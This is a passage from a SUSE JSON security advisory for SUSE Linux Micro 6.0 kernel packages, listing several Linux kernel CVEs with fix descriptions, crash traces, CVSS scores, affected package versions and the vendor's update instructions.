respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68286",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68286"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check NULL before accessing\n\n[WHAT]\nIGT kms_cursor_legacy\u0027s long-nonblocking-modeset-vs-cursor-atomic\nfails with NULL pointer dereference. This can be reproduced with\nboth an eDP panel and a DP monitors connected.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 13 UID: 0 PID: 2960 Comm: kms_cursor_lega Not tainted\n6.16.0-99-custom #8 PREEMPT(voluntary)\n Hardware name: AMD ........\n RIP: 0010:dc_stream_get_scanoutpos+0x34/0x130 [amdgpu]\n Code: 57 4d 89 c7 41 56 49 89 ce 41 55 49 89 d5 41 54 49\n 89 fc 53 48 83 ec 18 48 8b 87 a0 64 00 00 48 89 75 d0 48 c7 c6 e0 41 30\n c2 \u003c48\u003e 8b 38 48 8b 9f 68 06 00 00 e8 8d d7 fd ff 31 c0 48 81 c3 e0 02\n RSP: 0018:ffffd0f3c2bd7608 EFLAGS: 00010292\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffd0f3c2bd7668\n RDX: ffffd0f3c2bd7664 RSI: ffffffffc23041e0 RDI: ffff8b32494b8000\n RBP: ffffd0f3c2bd7648 R08: ffffd0f3c2bd766c R09: ffffd0f3c2bd7760\n R10: ffffd0f3c2bd7820 R11: 0000000000000000 R12: ffff8b32494b8000\n R13: ffffd0f3c2bd7664 R14: ffffd0f3c2bd7668 R15: ffffd0f3c2bd766c\n FS: 000071f631b68700(0000) GS:ffff8b399f114000(0000)\nknlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000001b8105000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n dm_crtc_get_scanoutpos+0xd7/0x180 [amdgpu]\n amdgpu_display_get_crtc_scanoutpos+0x86/0x1c0 [amdgpu]\n ? __pfx_amdgpu_crtc_get_scanout_position+0x10/0x10[amdgpu]\n amdgpu_crtc_get_scanout_position+0x27/0x50 [amdgpu]\n drm_crtc_vblank_helper_get_vblank_timestamp_internal+0xf7/0x400\n drm_crtc_vblank_helper_get_vblank_timestamp+0x1c/0x30\n drm_crtc_get_last_vbltimestamp+0x55/0x90\n drm_crtc_next_vblank_start+0x45/0xa0\n drm_atomic_helper_wait_for_fences+0x81/0x1f0\n ...\n\n(cherry picked from commit 621e55f1919640acab25383362b96e65f2baea3c)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68286",
"url": "https://www.suse.com/security/cve/CVE-2025-68286"
},
{
"category": "external",
"summary": "SUSE Bug 1255351 for CVE-2025-68286",
"url": "https://bugzilla.suse.com/1255351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68286"
},
{
"cve": "CVE-2025-68287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths\n\nThis patch addresses a race condition caused by unsynchronized\nexecution of multiple call paths invoking `dwc3_remove_requests()`,\nleading to premature freeing of USB requests and subsequent crashes.\n\nThree distinct execution paths interact with `dwc3_remove_requests()`:\nPath 1:\nTriggered via `dwc3_gadget_reset_interrupt()` during USB reset\nhandling. The call stack includes:\n- `dwc3_ep0_reset_state()`\n- `dwc3_ep0_stall_and_restart()`\n- `dwc3_ep0_out_start()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 2:\nAlso initiated from `dwc3_gadget_reset_interrupt()`, but through\n`dwc3_stop_active_transfers()`. The call stack includes:\n- `dwc3_stop_active_transfers()`\n- `dwc3_remove_requests()`\n- `dwc3_gadget_del_and_unmap_request()`\n\nPath 3:\nOccurs independently during `adb root` execution, which triggers\nUSB function unbind and bind operations. The sequence includes:\n- `gserial_disconnect()`\n- `usb_ep_disable()`\n- `dwc3_gadget_ep_disable()`\n- `dwc3_remove_requests()` with `-ESHUTDOWN` status\n\nPath 3 operates asynchronously and lacks synchronization with Paths\n1 and 2. When Path 3 completes, it disables endpoints and frees \u0027out\u0027\nrequests. If Paths 1 or 2 are still processing these requests,\naccessing freed memory leads to a crash due to use-after-free conditions.\n\nTo fix this added check for request completion and skip processing\nif already completed and added the request status for ep0 while queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68287",
"url": "https://www.suse.com/security/cve/CVE-2025-68287"
},
{
"category": "external",
"summary": "SUSE Bug 1255152 for CVE-2025-68287",
"url": "https://bugzilla.suse.com/1255152"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68287"
},
{
"cve": "CVE-2025-68289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_eem: Fix memory leak in eem_unwrap\n\nThe existing code did not handle the failure case of usb_ep_queue in the\ncommand path, potentially leading to memory leaks.\n\nImprove error handling to free all allocated resources on usb_ep_queue\nfailure. This patch continues to use goto logic for error handling, as the\nexisting error handling is complex and not easily adaptable to auto-cleanup\nhelpers.\n\nkmemleak results:\n unreferenced object 0xffffff895a512300 (size 240):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n kmem_cache_alloc+0x1b4/0x358\n skb_clone+0x90/0xd8\n eem_unwrap+0x1cc/0x36c\n unreferenced object 0xffffff8a157f4000 (size 256):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n dwc3_gadget_ep_alloc_request+0x58/0x11c\n usb_ep_alloc_request+0x40/0xe4\n eem_unwrap+0x204/0x36c\n unreferenced object 0xffffff8aadbaac00 (size 128):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n __kmalloc+0x64/0x1a8\n eem_unwrap+0x218/0x36c\n unreferenced object 0xffffff89ccef3500 (size 64):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n eem_unwrap+0x238/0x36c",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68289",
"url": "https://www.suse.com/security/cve/CVE-2025-68289"
},
{
"category": "external",
"summary": "SUSE Bug 1255155 for CVE-2025-68289",
"url": "https://bugzilla.suse.com/1255155"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68289"
},
{
"cve": "CVE-2025-68290",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68290"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: fix double free on late probe failure\n\nThe MOST subsystem has a non-standard registration function which frees\nthe interface on registration failures and on deregistration.\n\nThis unsurprisingly leads to bugs in the MOST drivers, and a couple of\nrecent changes turned a reference underflow and use-after-free in the\nUSB driver into several double free and a use-after-free on late probe\nfailures.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68290",
"url": "https://www.suse.com/security/cve/CVE-2025-68290"
},
{
"category": "external",
"summary": "SUSE Bug 1255154 for CVE-2025-68290",
"url": "https://bugzilla.suse.com/1255154"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68290"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
